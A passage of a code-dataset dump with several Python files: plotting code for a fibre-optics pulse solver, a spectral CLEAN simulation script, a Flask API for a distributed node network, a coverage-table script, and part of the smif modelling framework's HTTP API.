[ns]')\n# plt.ylabel('Power [W]')\n# plt.axis([-1,1,0,10*np.max(np.abs(Pulsetot0)**2)])\n# \n# #plt.axis([-10*np.max(Tlist)*1e9,10*np.max(Tlist)*1e9,0,10*np.max(np.abs(Pulsetot0)**2)])\n# plt.legend(loc=\"upper right\", bbox_to_anchor=(0.8,0.7),frameon=False)\n# #plt.show()\n#\n#frames = []\n#print (frames)\n#for i in range(0,11):\n# frame = plot2(i,Pulsetot0,Pulsefinal_disp,pulsematrix)\n# frames.append(frame)\n# print(np.round(i/(11)*100,rounding))\n#\n#frame = plot2(10,Pulsetot0,Pulsefinal_disp,pulsematrix)\n#frames.append(frame)\n#\n#gif.save(frames, \"C:\\\\Users\\\\Bruger\\\\Dropbox\\\\Canada\\\\PhD\\\\Research Questions\\\\High Ext pulses\\\\Resolution enhancement\\\\EvolvingPulse.gif\", duration=700)\n#\n#print(\" \")\n#print(\"Finished the animation of the pulse\")\n#print(\" \")\n#\n#\n#print(\" \")\n#print(\"Begin creating animation of the extracted pulse\")\n#print(\" \")\n#\n#\n#\n#@gif.frame\n#def plot3(i,pulse2,extractedPulses):\n# \n# \n# \n# plt.figure(figsize=(10, 6), dpi=gifsize)#\n# plt.title('z = '+str(np.round(i/10*distance/1e3,rounding))+'km')\n# plt.plot(tau*1e9, np.abs(pulse2)**2+1e-100,label='Input')\n# 
plt.plot(tau*1e9, np.abs(extractedPulses[i*10,:])**2+1e-100,label='Output. Ampl = +'+str(np.round( 10*np.log10(np.max(np.abs(extractedPulses[i*10,:])**2)/np.max(np.abs(pulse2)**2) ),rounding)) +'dB') \n# \n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power [W]')\n# plt.axis([np.min(tau)*1e9,np.max(tau)*1e9,1e-6,10*np.max(np.abs(extractedPulses[100,:])**2)])\n# plt.yscale('log')\n# plt.grid()\n# plt.legend(loc=\"upper right\", bbox_to_anchor=(0.8,0.7),frameon=False)\n# #plt.show()\n#\n#extractedSpectra=np.multiply(spectrummatrix,boxfilt0)\n#extractedPulses=np.zeros_like(extractedSpectra)\n#for i in range(0,step_num+1):\n# #print(i)\n# ss, pulse=getPulseFromSpectrum(freq,extractedSpectra[i,:])\n# extractedPulses[i,:]=pulse\n#\n#\n#frames = []\n#print (frames)\n#for i in range(0,11):\n# frame = plot3(i,pulse2,extractedPulses)\n# frames.append(frame)\n# print(np.round(i/(11)*100,rounding))\n#\n#frame = plot3(10,pulse2,extractedPulses)\n#frames.append(frame)\n#\n#gif.save(frames, \"C:\\\\Users\\\\Bruger\\\\Dropbox\\\\Canada\\\\PhD\\\\Research Questions\\\\High Ext pulses\\\\Resolution enhancement\\\\Evolving_m=0_Pulse.gif\", duration=700)\n#\n#print(\" \")\n#print(\"Finished the animation of the extracted pulse\")\n#print(\" \")\n#\n#frames=[]\n#\n#print(\" \")\n#print(\"Begin making surface plots of spectra and pulses\")\n#print(\" \")\n#\n#\n#fig, ax = plt.subplots()\n#ax.set_title('Spectrum Evolution')\n#x = fplot\n#y = np.linspace(0,step_num*deltaz,step_num)/1e3 \n#X, Y = np.meshgrid(x, y)\n#Z=np.abs(spectrummatrix)**2*1e12+1e-100\n#Z = np.log10(Z[:-1, :])\n#Z[Z<-30]=-30\n#surf=ax.contourf(X, Y, Z)\n#ax.set_xlabel('Frequency [THz]')\n#ax.set_ylabel('Distance [km]')\n#ax.set_xlim(np.min(fplot),np.max(fplot))\n#cbar=fig.colorbar(surf, ax=ax) \n#cbar.set_label(\"Intensity [W/THz]\" )\n#plt.savefig('SpectrumEvolution.pdf',bbox_inches='tight')\n#plt.show()\n#\n#\n#fig, ax = plt.subplots()\n#ax.set_title('Pulse Evolution for m=0')\n#x = tau*1e9\n#y = np.linspace(0,step_num*deltaz,step_num)/1e3 \n#X, Y = np.meshgrid(x, y)\n#Z=(np.abs(extractedPulses)**2+1e-100)/(np.max(np.abs(extractedPulses[0,:])**2))\n#Z = 10*np.log10(Z[:-1, :])\n#Z[Z<-30]=-30\n#surf=ax.contourf(X, Y, Z)\n#ax.set_xlabel('Time [ns]')\n#ax.set_ylabel('Distance [km]')\n#ax.set_xlim(-40, 40)\n#cbar=fig.colorbar(surf, ax=ax) \n#cbar.set_label(\"Amplification [dB]\" )\n#plt.savefig('PulseEvolution.pdf',bbox_inches='tight')\n#plt.show()\n#\n#\n#chirpzoom=2**3\n#\n#fig, ax = plt.subplots()\n#ax.set_title('Pulse Chirp')\n#x = tau[int(nt/2-nt/chirpzoom):int(nt/2+nt/chirpzoom)]*1e9\n#y = np.linspace(0,step_num*deltaz,step_num)/1e3 \n#X, Y = np.meshgrid(x, y)\n#\n#chirpmatrix=np.zeros_like(X)\n#\n#\n#for i in range(0,len(pulsematrix[:,1])-1):\n# line=pulsematrix[i,int(nt/2-nt/chirpzoom):int(nt/2+nt/chirpzoom)]\n# c=getChirp(tau,line)\n# chirpmatrix[i,:]=c-np.mean(c[0:1000])\n# i=i+1\n#\n#Z=chirpmatrix/1e6\n##Z =(Z[:-1, :])\n##Z[Z<-300]=-300\n#surf=ax.contourf(X, Y, Z,cmap='RdBu')#levels=np.linspace(-5/2*np.min(Tlist)/1e6,5/2*np.min(Tlist)/1e6,11)\n#ax.set_xlabel('Time [ns]')\n#ax.set_ylabel('Distance [km]')\n##ax.set_xlim(-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9)\n#cbar=fig.colorbar(surf, ax=ax) \n#cbar.set_label(\"Chirp [MHz]\" )\n##plt.savefig('PulseChirp_wholePulse.pdf',bbox_inches='tight')\n#plt.show()\n#\n#\n#fig, ax = plt.subplots()\n#ax.set_title('Chirp of m=0 pulse')\n#x = tau[int(nt/2-nt/chirpzoom):int(nt/2+nt/chirpzoom)]*1e9\n#y = np.linspace(0,step_num*deltaz,step_num)/1e3 \n#X, Y = np.meshgrid(x, 
y)\n#\n#chirpmatrix=np.zeros_like(X)\n#\n#\n#for i in range(0,len(extractedPulses[:,1])-1):\n# line=extractedPulses[i,int(nt/2-nt/chirpzoom):int(nt/2+nt/chirpzoom)]\n# c=getChirp(tau,line)\n# chirpmatrix[i,:]=c-np.mean(c[0:1000])\n# i=i+1\n#\n#Z=chirpmatrix/1e6\n##Z =(Z[:-1, :])\n##Z[Z<-300]=-300\n#surf=ax.contourf(X, Y, Z,cmap='RdBu')#levels=np.linspace(-5/2*np.min(Tlist)/1e6,5/2*np.min(Tlist)/1e6,11)\n#ax.set_xlabel('Time [ns]')\n#ax.set_ylabel('Distance [km]')\n##ax.set_xlim(-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9)\n#cbar=fig.colorbar(surf, ax=ax) \n#cbar.set_label(\"Chirp [MHz]\" )\n##plt.savefig('PulseChirp_wholePulse.pdf',bbox_inches='tight')\n#plt.show()\n#\n#\n#bb2=np.array([11.2,5.6, 0,-0.112,-0.56,-1.11,-2.8,-5.6,-11.2])\n#dBP=np.array([ 4, 4,20, 20, 24, 32, 40, 50, 4])\n#\n#plt.figure()\n#plt.title('Max amp. vs. disp')\n#plt.plot(bb2,dBP,'b.',markersize=15)\n#plt.xlabel('beta2 [ps^2/m]')\n#plt.ylabel('Max ampl of m=0 [dB]')\n#plt.grid()\n#plt.show()\n#\n#\n","repo_name":"OleKrarup123/NLSE-vector-solver","sub_path":"NLSE solver Vector V1.py","file_name":"NLSE solver Vector V1.py","file_ext":"py","file_size_in_byte":50318,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"32158590818","text":"import sys\nsys.path.append('../')\nimport numpy as np\nfrom algorithms import CLEANed\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif']=['SimHei'] #用来正常显示中文标签\nplt.rcParams['axes.unicode_minus']=False #用来正常显示负号\n\n###########################\n#####simulation-signal#####\n###########################\nN = 200\ns0 = np.linspace(0, N//4-1, N//4)[list(set(np.random.choice(N//4, int(N//1.5))))]*4 + 0\ns1 = np.linspace(0, N//4-1, N//4)[list(set(np.random.choice(N//4, int(N//7.5))))]*4 + 1\ns2 = np.linspace(0, N//4-1, N//4)[list(set(np.random.choice(N//4, int(N//1.5))))]*4 + 2\ns3 = np.linspace(0, N//4-1, N//4)*4 + 3\nsample_point = np.sort(np.hstack((s1, s2, s3))).astype(int)\n\nT = 1\nt = np.linspace(0, T, N)[sample_point]\nf = np.cos(2*np.pi*31.25*t)\n\ng = 0.1\nnu_D,nu_W,W,B,R,S,power_spec = CLEANed(f, t, g=g)\n\n\n\n#####################\n#for continue func\nt_c = np.linspace(0, 1, 2000)\nf_c = np.cos(2*np.pi*31.25*t_c)\nnu_c = (np.linspace(0, len(t_c)-1, len(t_c))-len(t_c)//2)/len(t_c)*(len(t_c)-1)/t_c[-1]\nD_c = np.sum(f_c * np.exp(-2j*np.pi*(nu_c.reshape(len(nu_c), 1) * t_c)), axis=1)/len(t_c)\n\n\n###############################################\n######plot for fig:spectral_simult_signal######\n###############################################\nfig=plt.figure(figsize=(20,16))\nplt.subplots_adjust(hspace=0.2, wspace=0.2)\nax1=plt.subplot(2,2,1)\nax1.plot(t, f, 'k*')\nax1.plot(t_c, f_c, 'k--')\nax1.set_xlim(-0.02,1.02)\n\nax2=plt.subplot(2,2,2)\nax2.plot(nu_c, np.abs(D_c),'k-', label='F')\nax2.set_ylim(-0.025,0.525)\n\nax3=plt.subplot(2,2,3)\nax3.plot(nu_D, np.abs(R[0]),'k-', label='D')\n\nax4=plt.subplot(2,2,4)\nm = len(nu_W)//4\nax4.plot(nu_W[m-10:3*m+11], np.abs(W[m-10:3*m+11]),'k-', label='W')\nax4.plot(nu_W[m-10:3*m+11], np.abs(B[m-10:3*m+11]),'k-.', label='B')\n\ny_ticks_ax1=np.array([-1,-0.5,0,0.5,1])\nax1.set_yticks(y_ticks_ax1)\nax1.set_yticklabels(list(y_ticks_ax1),fontsize=16)\n\nfor (ax, label) in zip([ax1,ax2,ax3,ax4],['(a)','(b)', '(c)', '(d)']):\n ax.tick_params(labelsize=15)\n ax.text(-0.12, 0.96, label, horizontalalignment='center', fontsize=25, \n verticalalignment='center', transform=ax.transAxes)\n \nfor ax_i in [ax2,ax3,ax4]:\n ax_i.set_xlim(-105,105)\n ax_i.set_xlabel(u'频率 (Hz)',fontsize=25, 
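# Hedged sketch: the D_c line above is a direct (slow) discrete Fourier
# transform, which is what makes the irregular sampling tractable where a
# plain FFT is not. As a reusable function (illustrative; the production
# version lives in algorithms.CLEANed):
def dirty_spectrum(f_samples, t_samples, nu_grid):
    phase = np.exp(-2j * np.pi * nu_grid.reshape(-1, 1) * t_samples)
    return phase @ f_samples / len(t_samples)   # O(N_nu * N_t) direct sum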
labelpad = 10)\n ax_i.set_ylabel(u'功率',fontsize=25, labelpad = 15)\n ax_i.legend(loc='upper right', fontsize=20)\n ax_i.tick_params(labelsize=20)\n \nax1.set_xlabel(u'时间 (秒)',fontsize=25, labelpad = 10)\nax1.set_ylabel(u'信号',fontsize=25, labelpad = 0)\nax1.tick_params(labelsize=20)\n\n#plt.savefig('spectral_simult_signal.png', bbox_inches='tight')\nplt.show()\n\n\n################################################\n######plot for fig:spectral_simult_clean_g######\n################################################\nfig, ax = plt.subplots(4,2, sharey=True)\nplt.subplots_adjust(hspace=0.05, wspace=0.03)\nfig.set_size_inches(20,20)\nax[0, 0].plot(nu_D, np.abs(R[len(R)//8]),'k-')\nax[0, 1].plot(nu_D, np.abs(S[len(R)//8]),'k-')\nax[1, 0].plot(nu_D, np.abs(R[len(R)//4]),'k-')\nax[1, 1].plot(nu_D, np.abs(S[len(R)//4]),'k-')\nax[2, 0].plot(nu_D, np.abs(R[len(R)//2]),'k-')\nax[2, 1].plot(nu_D, np.abs(S[len(R)//2]),'k-')\nax[3, 0].plot(nu_D, np.abs(R[-1]),'k-')\nax[3, 1].plot(nu_D, np.abs(S[-1]),'k-')\n\niter_num= [len(R)//8, len(R)//4, len(R)//2, len(R)-1]\nfor ax_i, iter_i in zip(ax,iter_num):\n ax_i[0].set_ylabel(u'{0}*{1} 功率'.format(iter_i, g), fontsize=25, labelpad = 15)\n for ax_ii in ax_i:\n ax_ii.set_xlim(-105,105)\n ax_ii.set_ylim(-0.01, 0.52)\n ax_ii.tick_params(labelsize=20)\nax[0,0].set_title(u'脏谱',fontsize=30, pad = 20)\nax[0,1].set_title(u'洁谱',fontsize=30, pad = 20)\nax[-1,0].set_xlabel(u'频率 (Hz)',fontsize=25, labelpad = 10)\nax[-1,1].set_xlabel(u'频率 (Hz)',fontsize=25, labelpad = 10)\n \nfor ax_i in ax[:-1]:\n for ax_ii in ax_i:\n ax_ii.xaxis.set_tick_params(size=0)\n ax_ii.set_xticklabels('')\n#plt.savefig('spectral_simult_clean_g{0}.png'.format(g), bbox_inches='tight')\nplt.show()\n","repo_name":"fallingelf/PhD_Thesis","sub_path":"examples/simulation_signal.py","file_name":"simulation_signal.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17354385684","text":"from flask import Flask, send_from_directory\nfrom controllers.node_controller import *\nfrom communication.response_creator import *\nfrom controllers.node_controller import NetworkWaitException\n\nimport os.path as path\nimport sys\n\ngit_root = path.abspath(path.join(__file__, \"../../..\"))\n\napp = Flask('node', static_folder=git_root + '/angularjs/app/static')\n\n\n@app.route('/')\ndef default_response():\n return send_from_directory(git_root + '/angularjs/app', filename=\"index.html\")\n\n\n@app.route('/controller/')\ndef serve_controller(filename):\n return send_from_directory(git_root + '/angularjs/app/controller', filename=filename)\n\n\n@app.route('/service/')\ndef serve_service(filename):\n return send_from_directory(git_root + '/angularjs/app/service', filename=filename)\n\n\n@app.route('/app.js')\ndef serve_appjs():\n return send_from_directory(git_root + '/angularjs/app', filename='app.js')\n\n\n@app.route('/view/')\ndef serve_views(filename):\n return send_from_directory(git_root + '/angularjs/app/view', filename=filename)\n\n\n# Node API\n@app.route('/api/basic/ok', methods=['GET'])\ndef basic_ok():\n return ok_response({})\n\n\n@app.route('/api/basic/info', methods=['GET'])\ndef basic_info():\n try:\n ret = basic_info_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/basic/check', methods=['POST'])\ndef basic_check():\n try:\n [ip, port] = extract_data(request, ['ip', 'port'])\n except 
Exception as e:\n return error_response(str(e))\n\n try:\n ret = basic_check_controller(ip, port)\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n# Network API\n@app.route('/api/network/edges', methods=['GET'])\ndef network_edges():\n try:\n ret = network_edges_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/network/get_edge', methods=['POST'])\ndef network_get_edge():\n try:\n [type] = extract_data(request, ['type'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(network_get_edge_controller(type))\n\n\n@app.route('/api/network/set_edge', methods=['POST'])\ndef network_set_edge():\n try:\n [edge] = extract_data(request, ['edge'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(network_set_edge_controller(edge))\n\n\n@app.route('/api/network/adopt', methods=['POST'])\ndef network_adopt():\n try:\n [edge, can_redirect] = extract_data(request, ['edge', 'can_redirect'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(network_adopt_controller(edge, can_redirect))\n\n\n@app.route('/api/network/reset', methods=['GET'])\ndef network_reset():\n try:\n ret = network_reset_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n\n return ok_response(ret)\n\n\n@app.route('/api/network/visualize', methods=['GET'])\ndef network_visualize():\n try:\n ret = network_visualize_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n# Jobs API\n@app.route('/api/jobs/add/', methods=['POST'])\ndef jobs_add(jobid):\n try:\n [width, height, p, points] = extract_data(request, ['width', 'height', 'p', 'points'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n print(width, height, p, points)\n try:\n ret = jobs_add_controller(job_id=jobid, width=width, height=height, p=p, points=points)\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/new', methods=['POST'])\ndef jobs_new():\n try:\n [width, height, p, points] = extract_data(request, fields=['width', 'height', 'p', 'points'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n try:\n ret = jobs_new_controller(width=width, height=height, p=p, points=points)\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/all', methods=['GET'])\ndef jobs_all():\n try:\n ret = jobs_all_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/backup', methods=['POST'])\ndef jobs_backup():\n try:\n [uuid, jobid, point] = extract_data(request, fields=['uuid', 'jobid', 'point'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n try:\n ret = jobs_backup_controller(uuid=uuid, job_id=jobid, point=point)\n except Exception as e:\n return error_response(str(e))\n return 
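# Hedged refactoring sketch: every route above repeats the same
# try/except -> wait_response/error_response dance, which a decorator
# could centralise (illustrative only; not how the module is organised):
from functools import wraps

def guarded(view):
    @wraps(view)
    def wrapper(*args, **kwargs):
        try:
            return ok_response(view(*args, **kwargs))
        except NetworkWaitException:
            return wait_response()
        except Exception as e:
            return error_response(str(e))
    return wrapper

# @app.route('/api/network/reset', methods=['GET'])
# @guarded
# def network_reset():
#     return network_reset_controller()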
ok_response(ret)\n\n\n@app.route('/api/jobs/remove/', methods=['GET'])\ndef jobs_remove(jobid):\n try:\n ret = jobs_remove_controller(job_id=jobid)\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/kill/', methods=['GET'])\ndef jobs_kill(jobid):\n try:\n ret = jobs_kill_controller(job_id=jobid)\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/ids', methods=['GET'])\ndef jobs_ids():\n try:\n ret = jobs_ids_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/data/', methods=['GET'])\ndef jobs_data(jobid):\n try:\n ret = jobs_data_controller(job_id=jobid)\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/visualize/', methods=['GET'])\ndef jobs_visualize(jobid):\n try:\n ret = jobs_visualize_controller(job_id=jobid)\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n","repo_name":"delta003/distributed_chaos","sub_path":"python/api/node_api.py","file_name":"node_api.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6062209535","text":"import sys\nimport pandas as pd\n\ndef main():\n input_files = sys.argv[1:] # get all inputs from the command line into a list\n data = [] # initialize a data list\n for input_file in input_files: # iterate over every input file\n count = open(input_file, 'r').readline().rstrip() # get the first line of the file, wich is the count\n sample = input_file.split('/')[-1].split('_')[0]\n\n data.append([sample, count]) # append data list by extracted informations\n\n df = pd.DataFrame(data, columns=['sample', 'coverage']) # create dataframe from data list with specified column names\n df.to_csv('coverages.csv', index=False) # save dataframe to csv file\n\n\nif __name__ == '__main__':\n\n main()","repo_name":"jw44lavo/redux","sub_path":"wf_annotation_gpav/scripts/get_coverages_dataframe.py","file_name":"get_coverages_dataframe.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27374544282","text":"\"\"\"HTTP API endpoint\n\"\"\"\nfrom collections import defaultdict\n\nimport dateutil.parser\nimport smif\nfrom flask import current_app, jsonify, request\nfrom flask.views import MethodView\nfrom smif.exception import (\n SmifDataError,\n SmifDataInputError,\n SmifDataNotFoundError,\n SmifException,\n SmifValidationError,\n)\n\n\nclass SmifAPI(MethodView):\n \"\"\"Implement operations for Smif\"\"\"\n\n def get(self, key):\n \"\"\"Get smif details\n version: GET /api/v1/smif/version\n \"\"\"\n if key == \"version\":\n data = smif.__version__\n else:\n data = {}\n data[\"version\"] = smif.__version__\n\n response = jsonify({\"data\": data, \"error\": {}})\n return response\n\n\nclass ModelRunAPI(MethodView):\n \"\"\"Implement CRUD operations for model_run configuration data\"\"\"\n\n def get(self, model_run_name=None, action=None):\n \"\"\"Get model_runs\n all: GET /api/v1/model_runs/\n one: GET 
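# Hedged usage sketch for get_coverages_dataframe.py above (paths are
# illustrative):
#
#   python get_coverages_dataframe.py results/sampleA_cov.txt results/sampleB_cov.txt
#
# Each input file is expected to carry the coverage count on its first
# line; the sample name is the part of the basename before the first '_',
# and the result is written to coverages.csv with columns sample,coverage.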
/api/vi/model_runs/name\n \"\"\"\n data_interface = current_app.config.data_interface\n\n try:\n if action is None:\n if model_run_name is None:\n\n model_runs = data_interface.read_model_runs()\n\n if \"status\" in request.args.keys():\n # filtered: GET /api/v1/model_runs?status=done\n data = []\n for model_run in model_runs:\n status = current_app.config.scheduler.get_status(\n model_run[\"name\"]\n )\n if status[\"status\"] == request.args[\"status\"]:\n data.append(model_run)\n else:\n # all: GET /api/v1/model_runs/\n data = []\n data = model_runs\n else:\n # one: GET /api/vi/model_runs/name\n data = {}\n data = data_interface.read_model_run(model_run_name)\n elif action == \"status\":\n # action: GET /api/vi/model_runs/name/status\n data = {}\n data = current_app.config.scheduler.get_status(model_run_name)\n\n response = jsonify({\"data\": data, \"error\": {}})\n except SmifException as err:\n response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n\n return response\n\n def post(self, model_run_name=None, action=None):\n \"\"\"\n Create a model_run:\n - POST /api/v1/model_runs\n\n Perform an operation on a model_run\n - POST /api/v1/model_runs//\n\n Available actions are\n - start: Start the model_run\n - kill: Stop a model_run that is currently running\n - remove: Remove a model_run that is waiting to be executed\n - resume: Warm start a model_run\n \"\"\"\n data_interface = current_app.config.data_interface\n\n try:\n if action is None:\n data = request.get_json() or request.form\n data_interface.write_model_run(data)\n elif action == \"start\":\n data = request.get_json() or request.form\n args = {\n \"verbosity\": data[\"args\"][\"verbosity\"],\n \"warm_start\": data[\"args\"][\"warm_start\"],\n \"output_format\": data[\"args\"][\"output_format\"],\n }\n if hasattr(data_interface, \"model_base_folder\"):\n args[\"directory\"] = data_interface.model_base_folder\n current_app.config.scheduler.add(model_run_name, args)\n elif action == \"kill\":\n current_app.config.scheduler.kill(model_run_name)\n elif action == \"remove\":\n raise NotImplementedError\n elif action == \"resume\":\n raise NotImplementedError\n else:\n raise SyntaxError(\"ModelRun action '%s' does not exist\" % action)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 201\n return response\n\n def put(self, model_run_name):\n \"\"\"Update a model_run:\n PUT /api/v1/model_runs\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n\n try:\n data_interface.update_model_run(model_run_name, data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 200\n return response\n\n def delete(self, model_run_name):\n \"\"\"Delete a model_run:\n DELETE /api/v1/model_runs\n \"\"\"\n data_interface = current_app.config.data_interface\n data_interface.delete_model_run(model_run_name)\n response = jsonify({})\n return response\n\n\nclass SosModelAPI(MethodView):\n \"\"\"Implement CRUD operations for sos_model configuration data\"\"\"\n\n def get(self, sos_model_name):\n \"\"\"Get sos_model\n all: GET /api/v1/sos_models/\n one: GET /api/vi/sos_models/name\n \"\"\"\n # return str(current_app.config)\n data_interface = 
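# Hedged client-side sketch for the model-run 'start' action above; host,
# port, run name and the output_format value are all assumptions:
import requests

payload = {'args': {'verbosity': 0, 'warm_start': False,
                    'output_format': 'local_csv'}}
resp = requests.post(
    'http://localhost:5000/api/v1/model_runs/demo_run/start', json=payload)
print(resp.status_code, resp.json())   # 201 with {"message": "success"} on success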
data_interface = current_app.config.data_interface\n\n        try:\n            if sos_model_name is None:\n                data = []\n                data = data_interface.read_sos_models()\n            else:\n                data = {}\n                data = data_interface.read_sos_model(sos_model_name)\n\n            response = jsonify({\"data\": data, \"error\": {}})\n        except SmifException as err:\n            response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n\n        return response\n\n    def post(self):\n        \"\"\"Create a sos_model:\n        POST /api/v1/sos_models\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data = request.get_json() or request.form\n\n        try:\n            data_interface.write_sos_model(data)\n        except SmifException as err:\n            response = jsonify(\n                {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n            )\n        else:\n            response = jsonify({\"message\": \"success\"})\n\n        response.status_code = 201\n        return response\n\n    def put(self, sos_model_name):\n        \"\"\"Update a sos_model:\n        PUT /api/v1/sos_models\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data = request.get_json() or request.form\n\n        try:\n            data_interface.update_sos_model(sos_model_name, data)\n        except SmifException as err:\n            response = jsonify(\n                {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n            )\n        else:\n            response = jsonify({\"message\": \"success\"})\n\n        response.status_code = 200\n        return response\n\n    def delete(self, sos_model_name):\n        \"\"\"Delete a sos_model:\n        DELETE /api/v1/sos_models\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data_interface.delete_sos_model(sos_model_name)\n        response = jsonify({})\n        return response\n\n\nclass SectorModelAPI(MethodView):\n    \"\"\"Implement CRUD operations for sector_model configuration data\"\"\"\n\n    def get(self, sector_model_name):\n        \"\"\"Get sector_models\n        all: GET /api/v1/sector_models/\n        one: GET /api/v1/sector_models/name\n        \"\"\"\n        # return str(current_app.config)\n        data_interface = current_app.config.data_interface\n\n        try:\n            if sector_model_name is None:\n                data = []\n                data = data_interface.read_models(skip_coords=True)\n            else:\n                data = {}\n                data = data_interface.read_model(sector_model_name, skip_coords=True)\n\n            response = jsonify({\"data\": data, \"error\": {}})\n        except SmifException as err:\n            response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n        return response\n\n    def post(self):\n        \"\"\"Create a sector_model:\n        POST /api/v1/sector_models\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data = request.get_json() or request.form\n        data = check_timestamp(data)\n\n        try:\n            data_interface.write_model(data)\n        except SmifException as err:\n            response = jsonify(\n                {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n            )\n        else:\n            response = jsonify({\"message\": \"success\"})\n\n        response.status_code = 201\n        return response\n\n    def put(self, sector_model_name):\n        \"\"\"Update a sector_model:\n        PUT /api/v1/sector_models\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data = request.get_json() or request.form\n        data = check_timestamp(data)\n\n        try:\n            data_interface.update_model(sector_model_name, data)\n        except SmifException as err:\n            response = jsonify(\n                {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n            )\n        else:\n            response = jsonify({\"message\": \"success\"})\n\n        response.status_code = 200\n        return response\n\n    def delete(self, sector_model_name):\n        \"\"\"Delete a sector_model:\n        DELETE /api/v1/sector_models\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        
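# Drop the named model from the store; an empty JSON body signals success.\n        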
data_interface.delete_model(sector_model_name)\n        response = jsonify({})\n        return response\n\n\nclass ScenarioAPI(MethodView):\n    \"\"\"Implement CRUD operations for scenarios configuration data\"\"\"\n\n    def get(self, scenario_name):\n        \"\"\"Get scenarios\n        all: GET /api/v1/scenarios/\n        one: GET /api/v1/scenarios/name\n        \"\"\"\n        # return str(current_app.config)\n        data_interface = current_app.config.data_interface\n\n        try:\n            if scenario_name is None:\n                data = []\n                data = data_interface.read_scenarios(skip_coords=True)\n            else:\n                data = {}\n                data = data_interface.read_scenario(scenario_name, skip_coords=True)\n\n            response = jsonify({\"data\": data, \"error\": {}})\n        except SmifException as err:\n            response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n\n        return response\n\n    def post(self):\n        \"\"\"Create a scenario:\n        POST /api/v1/scenarios\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data = request.get_json() or request.form\n\n        try:\n            data = check_timestamp(data)\n            data_interface.write_scenario(data)\n        except SmifException as err:\n            response = jsonify(\n                {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n            )\n        else:\n            response = jsonify({\"message\": \"success\"})\n\n        response.status_code = 201\n        return response\n\n    def put(self, scenario_name):\n        \"\"\"Update a scenario:\n        PUT /api/v1/scenarios\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data = request.get_json() or request.form\n\n        try:\n            data = check_timestamp(data)\n            data_interface.update_scenario(scenario_name, data)\n        except SmifException as err:\n            response = jsonify(\n                {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n            )\n        else:\n            response = jsonify({\"message\": \"success\"})\n\n        response.status_code = 200\n        return response\n\n    def delete(self, scenario_name):\n        \"\"\"Delete a scenario:\n        DELETE /api/v1/scenarios\n        \"\"\"\n        data_interface = current_app.config.data_interface\n        data_interface.delete_scenario(scenario_name)\n        response = jsonify({})\n        return response\n\n\nclass DimensionAPI(MethodView):\n    \"\"\"Implement CRUD operations for dimensions 